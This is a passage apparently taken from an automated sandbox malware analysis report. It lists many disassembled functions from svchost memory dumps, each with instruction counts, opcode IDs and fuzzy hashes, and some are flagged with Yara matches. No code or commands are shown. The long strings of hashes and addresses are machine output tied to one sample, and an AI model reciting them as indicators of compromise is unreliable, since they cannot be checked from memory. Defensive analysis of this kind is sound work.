                                                                                                              • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                              • Instruction Fuzzy Hash: EB3180116586F10ED30E836D08BDA75AEC18E9720174EC2FEDADA6F2F3C0888408D3A5
                                                                                                              Function 03B402E1 Relevance: .1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                              • Instruction ID: b6bd5dd3b45c9758cf369770b235076a813f2c8f1de99e3131c1d082c260aee1
                                                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                              • Instruction Fuzzy Hash: 2131E432A04244AFDB21DB68CC40B9AFFB9EF09358F0885F6E855DB251D6749944CBA4
                                                                                                              Function 03B59274 Relevance: .1, Instructions: 105COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2f756f6c4f5d83906839ed65bc65ba0733a46e9cc20fc5b0db3d5abc1f31be06
                                                                                                              • Instruction ID: 1adde6a1f4619d8aa5538664496e527236b96c37e21779a4bb8084330304a587
                                                                                                              • Opcode Fuzzy Hash: 2f756f6c4f5d83906839ed65bc65ba0733a46e9cc20fc5b0db3d5abc1f31be06
                                                                                                              • Instruction Fuzzy Hash: 1E316F75A00328EFDB21DB24DC40B9AB7B9EF85718F1501F9B94CEB280DB709E448B91
                                                                                                              Function 03B35702 Relevance: .1, Instructions: 104COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ce08acf198091ac2cc23d84ce658592ac9beecf5fd6c9d418fe7232393575018
                                                                                                              • Instruction ID: d906ff91875002faec1b1d0acf59984e46e2d23c03ae16e10595704e71450b4b
                                                                                                              • Opcode Fuzzy Hash: ce08acf198091ac2cc23d84ce658592ac9beecf5fd6c9d418fe7232393575018
                                                                                                              • Instruction Fuzzy Hash: DE319D35301A16EBDB65EB24CA80A99F7A9FF46258F0450B6E9418BA50DB70E820DBD0
                                                                                                              Function 03B34260 Relevance: .1, Instructions: 102COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f502cc663c534baa0b308673ae2fed754a1e29e9fbac443583012b2fb6c206b4
                                                                                                              • Instruction ID: 80c1ab2c1e72c1ac9d8e0b16800ccd9c7720e54252a92d9d1ed66dc0d5b7e71c
                                                                                                              • Opcode Fuzzy Hash: f502cc663c534baa0b308673ae2fed754a1e29e9fbac443583012b2fb6c206b4
                                                                                                              • Instruction Fuzzy Hash: EB41AF35500B449FDB22DF29C981B96BBE9EB46318F0444BAE5998B250D774E800CB50
                                                                                                              Function 03B550E4 Relevance: .1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                              • Instruction ID: 2c63a0281b1ff59f2d0efc23408943097ee740a5a4a656a36577bc230cd02268
                                                                                                              • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                                                                              • Instruction Fuzzy Hash: CE31D4317083459BDB31DA28C800767BAD9EB8675DF0C85FBFC868B291D274D841C792
                                                                                                              Function 03BF61C3 Relevance: .1, Instructions: 97COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8c2613613af01752a7875af2820fe673985709d56bf7e6991d042c9a6846f238
                                                                                                              • Instruction ID: a9db3d6aa2180555f379d87c6368d36dac6016e2776efab46fc915ed5ddc4748
                                                                                                              • Opcode Fuzzy Hash: 8c2613613af01752a7875af2820fe673985709d56bf7e6991d042c9a6846f238
                                                                                                              • Instruction Fuzzy Hash: 2131A176E00219EFDB15DFA8C840BAEB7B9EB44744F4541B9E900AB244D774ED04CB94
                                                                                                              Function 03BF6BD7 Relevance: .1, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f466742bce7b4a05981ebb1b989d8c148270de5da6cb1858e386f291f66732b7
                                                                                                              • Instruction ID: fea9a6ab81b8239e29545de46bcaa5a4fe26763d3cf0f6c42b2cfdc3d99d1eec
                                                                                                              • Opcode Fuzzy Hash: f466742bce7b4a05981ebb1b989d8c148270de5da6cb1858e386f291f66732b7
                                                                                                              • Instruction Fuzzy Hash: 16316C31610214AFCB24DF2AD885B9B7BF4FF49344B8584B9E908DF249D270E959CBA4
                                                                                                              Function 03BF60B8 Relevance: .1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d5d03f7c4a7993f87dfdece9c6c55b763321cc70590bdda50dadb69d56fd163b
                                                                                                              • Instruction ID: 10bef64553db3349235e81f65c8102e5bc346929dd58a18c5fb89279fc385065
                                                                                                              • Opcode Fuzzy Hash: d5d03f7c4a7993f87dfdece9c6c55b763321cc70590bdda50dadb69d56fd163b
                                                                                                              • Instruction Fuzzy Hash: D531D179700615AFDB22EBA9C840B6EBBA9EF44718F0410F9EA45DB341DB30DE048B90
                                                                                                              Function 03B307AF Relevance: .1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 845344dbf0c3c17405c3394a10d753d1aa115919481b8cc67119b7c7163777af
                                                                                                              • Instruction ID: 62e90d780a0169d18241d1318db39e8a4429d86726dbb8df5e4772941114ff1b
                                                                                                              • Opcode Fuzzy Hash: 845344dbf0c3c17405c3394a10d753d1aa115919481b8cc67119b7c7163777af
                                                                                                              • Instruction Fuzzy Hash: B031C836A04761DBC711FF288880A6BBBA5EF86658F0545B9FC5A9B310DA30DC11C7E1
                                                                                                              Function 0042EAE3 Relevance: .1, Instructions: 93COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 05d1c44c02fb93cacee1e73ad732c9f76cf38427e2df321513106ea3834658cb
                                                                                                              • Instruction ID: 0f90a10ea85466345375f5cf5a7b1e29a0fb5d51a7e3a3f0256689b5b7c55dc5
                                                                                                              • Opcode Fuzzy Hash: 05d1c44c02fb93cacee1e73ad732c9f76cf38427e2df321513106ea3834658cb
                                                                                                              • Instruction Fuzzy Hash: CD31DF72B106265BD354CE3AE880656F7E2FB88320B54863AC919C3B40E778F961CBD4
                                                                                                              Function 03B2D6AA Relevance: .1, Instructions: 93COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                              • Instruction ID: 03bedffa196e051d947e51687077e25192dc33645b703b3c760854758d765e70
                                                                                                              • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                                                                              • Instruction Fuzzy Hash: 3731C836600614AFDB22DE54C880B6ABBB9DB84758F1D85FDED2D9B260D738DD40CB50
                                                                                                              Function 00403200 Relevance: .1, Instructions: 92COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a36c1d5d40eb4061929a6eeaa9fd6fa0dfe20199c7b2c5b022fe5630ec2f704b
                                                                                                              • Instruction ID: 6ee2045f8c6a47047b8731f54c6398829193a06f955e8ec452eca25a223ff1f6
                                                                                                              • Opcode Fuzzy Hash: a36c1d5d40eb4061929a6eeaa9fd6fa0dfe20199c7b2c5b022fe5630ec2f704b
                                                                                                              • Instruction Fuzzy Hash: 9431C072A10B148FD3A8CE6DD945203B7E5EB88304B418A7ED85AD7B80C778FD01CB84
                                                                                                              Function 03B357C0 Relevance: .1, Instructions: 92COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a762d2dd7cf33b326824602e3d105dec9a03e74743be9ff45b8be0c582cc5876
                                                                                                              • Instruction ID: 6fb2488124004021468ddc6e849da2a08aca05a594b921b4f135d1b2a6d6d857
                                                                                                              • Opcode Fuzzy Hash: a762d2dd7cf33b326824602e3d105dec9a03e74743be9ff45b8be0c582cc5876
                                                                                                              • Instruction Fuzzy Hash: 4031A039715A15FFDB51EB24CA80AA9BBA6FF45308F4450B6E9018BB50D731E830DB81
                                                                                                              Function 03B6A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                              • Instruction ID: a15a01d08587070a9894bcec66316be0d0ba6f63de136043352c22f5a81d5a5d
                                                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                              • Instruction Fuzzy Hash: 2C312FB2B04B00AFDB60CF69DD41B67B7F8FB08A54F0805BDA59AD3651E634E900CB64
                                                                                                              Function 03B5438F Relevance: .1, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5561d59837cbd374e6e6c69621a7dadd7ae23def3859a103b363bb6217f04746
                                                                                                              • Instruction ID: 37ec8922f0a1a764898fd52ca496202b1ecf799bbea0526b14cae0edd773c0fe
                                                                                                              • Opcode Fuzzy Hash: 5561d59837cbd374e6e6c69621a7dadd7ae23def3859a103b363bb6217f04746
                                                                                                              • Instruction Fuzzy Hash: 4331B332B403059FDB24EFA9C980B6AB7F9EB8430DF0085BAE845D7254DB70E985CB50
                                                                                                              Function 03B392C5 Relevance: .1, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                              • Instruction ID: a4a2f93144704fe7dbb302ffbc18db4d8b63af07cbc4b87283ac7f03e72be370
                                                                                                              • Opcode Fuzzy Hash: 2963604b138b45d82781e0a3e479f75d70978de019cd50ff7a7906112cbdd64f
                                                                                                              • Instruction Fuzzy Hash: FD318DB56083199FCB01DF18D840A5ABBE9EF89318F0409BAFC559B3A0D730DD14CBA6
                                                                                                              Function 03B87190 Relevance: .1, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                              • Instruction ID: 01a3419dc82550df0f6847c04ad718446c9e467251ab7d83116b90f878827050
                                                                                                              • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                                                                              • Instruction Fuzzy Hash: D6316775604206CFC710DF18C480956FBF5FF89358B2986A9E9589B325EB30ED06CB91
                                                                                                              Function 03BEC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                              • Instruction ID: f060725c96ec797ab3afed1e119375ba013ec76e9658d65bd4251a3575a74102
                                                                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                              • Instruction Fuzzy Hash: 9C212D3F60075566CB14EBA98800ABAFBB4EF80718F4080BAFD668B551E734D950C360
                                                                                                              Function 03B2C156 Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a51908313d5be215cc09ba8512595abc4e8e258cf395d2ab70153f00ba39fb62
                                                                                                              • Instruction ID: 58b58e29c4eecdc3efa66739d762037acbd64e3444937d9c4b2b7be309e9708f
                                                                                                              • Opcode Fuzzy Hash: a51908313d5be215cc09ba8512595abc4e8e258cf395d2ab70153f00ba39fb62
                                                                                                              • Instruction Fuzzy Hash: 9E31D6795003108BCB30FF14C841B69B7B4EF41318F5885FED9499F381DA749986DBA4
                                                                                                              Function 03C003E6 Relevance: .1, Instructions: 86COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd092b47e80ac2f1a724d6d816c1a5b5ca23cfb780421165816af24987eb56d5
                                                                                                              • Instruction ID: bef8ae159d95d262ef80d5d8efab139bbb8de28a03f774520c6ab9a7b4df3b41
                                                                                                              • Opcode Fuzzy Hash: dd092b47e80ac2f1a724d6d816c1a5b5ca23cfb780421165816af24987eb56d5
                                                                                                              • Instruction Fuzzy Hash: 33314171A10169AFCB18DBA5D894F9FBBB9FB88214F464169E905E7240DB306E04CBA4
                                                                                                              Function 03B2E388 Relevance: .1, Instructions: 86COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction ID: e88691ecf482c872712b11891ed3e77ab94e68f1d60f9dcf8af1172aaa900362
                                                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction Fuzzy Hash: 37318735600614AFDB21DF69C884F6ABBF8EF84358F1446B9E5168B290E730EA02CB50
                                                                                                              Function 03BAE609 Relevance: .1, Instructions: 86COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cea55e802675ecba78d1e30c0bab73dd81410caeaff635bcd1f5e2800434481b
                                                                                                              • Instruction ID: 229923f050ef8575f9f9911a3efbc2b09139820f538d53bdf21a17163bb678b6
                                                                                                              • Opcode Fuzzy Hash: cea55e802675ecba78d1e30c0bab73dd81410caeaff635bcd1f5e2800434481b
                                                                                                              • Instruction Fuzzy Hash: 9131A275A04A05DFCB14DF1CC484DAEB7B6FF84308B1549A9E805DB390E771EA51CB90
                                                                                                              Function 03B33616 Relevance: .1, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d408c86f717bd92051fda8da70666b9df373e43a06e44ffb5fbc49e262ee9f66
                                                                                                              • Instruction ID: 1a10047c47727b7876f8c6cdbbb7a146dfb1e1e4b7e9041e43808a0151d1aee7
                                                                                                              • Opcode Fuzzy Hash: d408c86f717bd92051fda8da70666b9df373e43a06e44ffb5fbc49e262ee9f66
                                                                                                              • Instruction Fuzzy Hash: 5621C5392497609FC761EF15C944B2BBBE4FB82A18F0904B9E8498F651C7B0E844DB91
                                                                                                              Function 03C00591 Relevance: .1, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1a0e2459afeccec150c139c27787c362f79bdc283bd984a043668b9dc69bde01
                                                                                                              • Instruction ID: 963b39f77edacdd5b60ef9171b781a39f9ed76768092c544d95fc60aab0cc1e5
                                                                                                              • Opcode Fuzzy Hash: 1a0e2459afeccec150c139c27787c362f79bdc283bd984a043668b9dc69bde01
                                                                                                              • Instruction Fuzzy Hash: CD2105326146558FD728CE29C880BBAB3A6EFD4300F5A4478ED05CB2C5D730F945CB50
                                                                                                              Function 03B5F32A Relevance: .1, Instructions: 79COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                              • Instruction ID: 1a2579485e960d9a37f8646c3d659b699dd3517c677d08cfcbab654024eefdb4
                                                                                                              • Opcode Fuzzy Hash: e1acee25a86a18db778833508db53c8429f7f2c8d9f42c0ea70f9f679245ea3d
                                                                                                              • Instruction Fuzzy Hash: CE218E72200300DFD719DF15C445B6AFBE9EF95369F1581BDE90A8B2A0EB70E901CA94
                                                                                                              Function 03BB06F1 Relevance: .1, Instructions: 79COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3f0810d9300d4aa69625cb6197e3e45abc343d72fbb0e8539cf073d1aa9c0619
                                                                                                              • Instruction ID: e5b4aa3b3884d6f7053d0ce353712a355f590b4509fb2f6f1a4968aa752aff26
                                                                                                              • Opcode Fuzzy Hash: 3f0810d9300d4aa69625cb6197e3e45abc343d72fbb0e8539cf073d1aa9c0619
                                                                                                              • Instruction Fuzzy Hash: 27217E75A106299BCB20EF59C881ABEF7F8FF48744F5400A9E541EB250DB78AD51CBA0
                                                                                                              Function 03BB019F Relevance: .1, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f190feb4a19f6c1e9c2c0019c173d52c541dc13054f098f25a72c31eb7039b1c
                                                                                                              • Instruction ID: 9c3eb5522dfd8774cfc2200c1525209bd20a316589079e0e942a968194211846
                                                                                                              • Opcode Fuzzy Hash: f190feb4a19f6c1e9c2c0019c173d52c541dc13054f098f25a72c31eb7039b1c
                                                                                                              • Instruction Fuzzy Hash: 03218D75600644AFC715EB68C940B6AB7B8FF48744F1800A9F944DB691D774ED50CB58
                                                                                                              Function 03BB0283 Relevance: .1, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b31894fc8823b24e0b7b51b0c94310e3c8b1b2b567bc856570d9644a02780316
                                                                                                              • Instruction ID: 57b86080f7781d05c00404422fc0a1f1de8bb59ebdbbabc5f400f76adb095ac4
                                                                                                              • Opcode Fuzzy Hash: b31894fc8823b24e0b7b51b0c94310e3c8b1b2b567bc856570d9644a02780316
                                                                                                              • Instruction Fuzzy Hash: 052192729043459BD711EB59C848BBBBBECFF85248F0C44B6BC848B251DB74DA48C6A2
                                                                                                              Function 03BAD0C0 Relevance: .1, Instructions: 73COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                              • Instruction ID: 2afc854acc7d0bba07a89699027e6be4140b9c7adb8ec69bccca8141b9026425
                                                                                                              • Opcode Fuzzy Hash: a31c2c23b4517fa83190f2f071b075dcb825627450a6f94414447da29f9bb9ec
                                                                                                              • Instruction Fuzzy Hash: AB21B072748B04ABD321DE1C8C51B5ABBA4EB89728F04057EF9499B7A0D730D90187A9
                                                                                                              Function 03C001AA Relevance: .1, Instructions: 71COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
